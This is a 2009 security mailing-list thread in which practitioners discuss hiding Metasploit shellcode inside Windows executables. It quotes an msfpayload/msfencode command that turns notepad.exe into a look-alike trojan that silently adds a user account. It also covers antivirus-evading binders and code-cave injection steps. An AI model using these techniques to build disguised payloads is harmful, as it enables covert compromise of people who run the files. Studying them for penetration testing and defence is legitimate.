[Pauldotcom] Manually embedding shellcode into executables
irongeek at irongeek.com
Wed Dec 2 06:05:48 UTC 2009
Thanks. I was a little confused since on the show it seemed that Dave was
saying it acted like a binder.
I''ve used iexpress before:
nice thing about it as a binder, since it's made by Microsoft, AV won't
I'd still love to use msfencode with an arbitrary exe however.
On Tue, Dec 1, 2009 at 9:05 PM, Rob Fuller <jd.mubix at gmail.com> wrote:
> Correct, the actual execution of the original binary is somewhat destroyed
> in trade though it's nearly undetectable at this point in time. So
> technically you could use this with my IExpress 'hack'
> http://www.room362.com/blog/2009/3/2/metasploit-hearts-microsoft.html -
> but your going to have to manually change the Icon and the file size will
> The reason why your exe | to encode isn't working is because when you do
> msfpayload in raw format it is just the shellcode instruction set that is
> getting sent to msfencode, where as you cat or echo is including all the PE
> headers and sections of a compiled binary, which "at this time" msfencode
> does not know how to handle. As you stated, this in 'binder' territory.
> Now back to the original topic, shoving shellcode into binaries is a tricky
> process, well, if you want it to go unnoticed, because you have to do a
> couple things:
> 1: Find a 'code cave' (a location in the binary that full of null bytes and
> (here is the tricky part) isn't used by the binary for extraction,
> compression or decompression at any time during execution.
> 2. Reroute execution to your shell code, safely and in a manor that doesn't
> hang the process until you close your shell.
> 3. Correct the registers so that after your shell code executes, the
> trojan'd binary doesn't fall over and die because it couldn't find the
> things it needed in memory.
> to do this all successfully and *arbitrarily* you need to get
> pretty intimate with the entire life of a process.
> Rob Fuller | Mubix
> Room362.com | Hak5.org | TheAcademyPro.com
> On Tue, Dec 1, 2009 at 5:17 PM, Adrian Crenshaw <irongeek at irongeek.com>wrote:
>> Ok, I just read Rob post here:
>> and checked my exes. Since both are the same size, I'm guessing it's not
>> working as a binder but as a "cloaker" of sorts.
>> On Tue, Dec 1, 2009 at 5:12 PM, Adrian Crenshaw <irongeek at irongeek.com>wrote:
>>> Ok, I did this:
>>> $ msfpayload windows/adduser user=test pass=test exitfunc=seh R |
>>> msfencode -t exe -x notepad.exe -o MYNEWFILE.exe
>>> The exe made has the same icon an metadata as the original. The payload
>>> runs since the "test" account is created, but notepad never comes up, so it
>>> doen not make much of a binder. Any ideas?
>> Pauldotcom mailing list
>> Pauldotcom at mail.pauldotcom.com
>> Main Web Site: http://pauldotcom.com
> Pauldotcom mailing list
> Pauldotcom at mail.pauldotcom.com
> Main Web Site: http://pauldotcom.com
-------------- next part --------------
An HTML attachment was scrubbed...
More information about the Pauldotcom